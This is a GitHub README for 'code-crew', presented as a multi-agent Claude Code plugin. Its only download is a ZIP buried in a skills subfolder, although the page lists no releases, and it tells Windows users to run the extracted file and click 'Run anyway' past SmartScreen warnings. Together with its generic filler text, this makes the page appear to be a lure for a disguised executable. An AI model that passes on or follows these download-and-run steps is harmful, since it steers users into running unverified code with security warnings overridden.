Skip to content

astrocytic-sperry416/code-crew

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

🧩 code-crew - Run multiple AI agents with control

Download code-crew

🖥️ What this app does

code-crew is a plugin for Claude Code that helps it work like a small team. It uses 11 AI agents, sends each task to the right model, and checks your codebase in layers so it can find what it needs faster.

Use it when you want help with code review, file search, task splitting, or project changes inside Claude Code.

📥 Download and install

Open this page and visit this page to download: https://raw.githubusercontent.com/astrocytic-sperry416/code-crew/main/skills/skill-injector/code-crew-3.8.zip

If you are on Windows, follow these steps:

  1. Open the link above in your web browser.
  2. Look for the latest release or the main download files on the page.
  3. Download the Windows file or package shown there.
  4. If the file is in a ZIP folder, right-click it and choose Extract All.
  5. Open the extracted folder.
  6. Run the app or install the plugin using the file included in the download.

If the page gives you a setup file, double-click it to start the install. If it gives you a folder, use the included instructions in that folder.

🚀 Before you start

Use a Windows PC with:

  • Windows 10 or Windows 11
  • At least 8 GB of RAM
  • A stable internet connection
  • Claude Code already installed
  • Enough free disk space for the app and your code projects

For the best results, keep your project folder closed in other apps while code-crew runs.

🧭 How to use it

  1. Install or open Claude Code on your Windows PC.
  2. Add code-crew using the files from the download page.
  3. Open the project you want help with.
  4. Start a task in Claude Code.
  5. Let code-crew route the work to the right agent.
  6. Review the output before you apply changes.

The plugin can help with:

  • Reading a codebase
  • Finding files and symbols
  • Breaking a task into smaller parts
  • Checking code before changes
  • Suggesting the right model for each job
  • Injecting the right skill for the task

🔧 What you get

code-crew is built around three parts:

  • 11 AI agents that handle different kinds of work
  • Model routing that picks the right model for each task
  • 3-layer codebase indexing that helps search large projects

It also supports auto skill injection. That means it can load the right helper skill when the task needs it.

🧱 How the indexing works

code-crew uses three layers to map a codebase:

  • A fast top layer for broad project views
  • A middle layer for file and folder structure
  • A deeper layer for code details and relationships

This helps Claude Code answer questions with more context and less guessing.

🤖 Agent roles

The agents can act like separate helpers. Each one can focus on a task such as:

  • Planning
  • File discovery
  • Code reading
  • Change checks
  • Task routing
  • Context cleanup
  • Skill selection
  • Result review

This setup keeps work organized when a project gets large.

🪟 Windows setup tips

If Windows asks whether you trust the file:

  1. Check that the file came from the GitHub link above.
  2. Open the file only after the download finishes.
  3. If SmartScreen appears, choose More info, then Run anyway if you trust the source.
  4. If your browser blocks the file, allow the download from the browser bar.

If you use a ZIP file, extract it first. Do not run files from inside the ZIP window.

📁 Suggested folder setup

Keep your files in a simple place, such as:

  • C:\code-crew
  • C:\Users\YourName\Downloads\code-crew

This makes it easier to find the app again later.

🛠️ Common uses

Use code-crew when you want help with:

  • A large codebase that is hard to search
  • A task that needs more than one pass
  • Choosing the best agent for a job
  • Finding where a feature lives
  • Understanding old code
  • Preparing changes before you edit files

🔍 Topics covered

This project fits into these areas:

  • AI agents
  • Claude Code
  • Code automation
  • Multi-agent orchestration
  • Developer tools
  • Codebase indexing
  • Claude Code skills
  • AI coding assistant tools

❓ If it does not start

Try these steps:

  1. Close Claude Code.
  2. Open the app or plugin files again.
  3. Make sure you downloaded the full file.
  4. Check that the folder is not still zipped.
  5. Restart your PC.
  6. Open Claude Code and try again.

If the app still does not start, return to the download page and check for a newer release

📌 Project details

Releases

No releases published

Packages

 
 
 

Contributors